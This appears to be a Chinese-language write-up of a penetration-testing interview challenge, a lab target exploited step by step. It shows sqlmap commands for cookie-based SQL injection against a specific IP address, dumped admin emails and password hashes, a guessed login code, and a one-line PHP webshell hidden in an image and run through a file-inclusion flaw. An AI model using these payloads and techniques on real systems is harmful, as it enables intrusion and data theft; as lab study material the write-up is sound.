朋友面試,發來一道實戰題,在公網上找到了同樣的題目,這裡記錄一下。
打開題目鏈接如下:
點擊 about 頁面,有一些提示信息。
告訴需要進行目錄掃描,利用 dirsearch 進行了目錄掃描,發現了一些文件。
訪問 robots.txt 查看是否有敏感信息。
提示了 / 1234,但訪問後顯示 404。
這個網站把 robots.txt 改了,通過朋友面試靶機的 robots.txt 文件知道內容為 Company_admin/login.php,這是此網站的後台。
後台需要郵件、密碼和四位數的認證碼。通過簡單的爆破發現此頁面每刷新一次驗證碼都會改變,所以說表單爆破這個方法不可行。
面試靶機在 about.php 頁面中還有個提示就是 sqli,sqli 注入,顯然頁面上有 sql 注入漏洞。
點擊首頁的 blog,發現這裡有 id 的參數,嘗試是否有 sql 注入。
這裡給了個提示,“關於我的密碼”。
直接用 sqlmap 進行注入利用,發現直接利用無法進行跑出內容。
通過測試發現注入點存在 cookie 這個點。
3 和 4。
直接用 sqlmap 跑。
sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog --tables
存在五張表。
讀取表內容:
sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog -T admin –columns
sqlmap 跑 admin 的字段的時候,一直報錯,所以這裡就手工注入。
得到五個賬號:
2020-08-08 20:16:55:fakeaddr@gmail.com:e69dc2c09e8da6259422d987ccbe95b5
2021-10-19 01:44:56:123@qq.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 02:53:01:qwe@gmail.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 23:41:40:qian@gmail.com:e10adc3949ba59abbe56e057f20f883e
[email protected]的明文為 asdqwe123
那只剩下 4 位數的認證碼了。既然不能爆破,在 about 頁面的提示出,提示過 “一些社會工程”。
在面試靶機中的 blog 處,有兩篇文章,其中一篇是祝自己生日快樂,有個生日日期,2019-10-27。
嘗試輸入,通過 1027 登錄成功。
登錄後界面如下:
在 Blog-create post 處,存在上傳點,測試後,發現這個地方白名單,限制了只能上傳圖片格式的後綴。
看看是否存在文件包含漏洞,直接包含圖片馬,然後執行命令。
在 access-language 處,有個參數很熟悉 “?template=”。
可直接進行文件包含,天時地利人和,準備圖片馬。
製作圖片馬,準備一個 php 文件,一個 png 文件。
cat 1.php >> 1.png
經過測試發現,該靶機上傳的 webshell,不能通過 get 或 post 請求去連接,只能和 sql 注入一樣,通過 cookie 參數去連接,然後執行命令。
首先準備如下一句話木馬文件。
<?php system($_COOKIE['a']);?>
然後通過上面的方法製作圖片馬,生成後如下圖。
回到創建博客的地方,上傳圖片馬。
地址 upload/0c3459ff68c1495cefc557f0084a2ac6.png。
用 burp 抓這個包,然後在 cookie 處執行命令。
開始找 flag。
成功找到 flag。
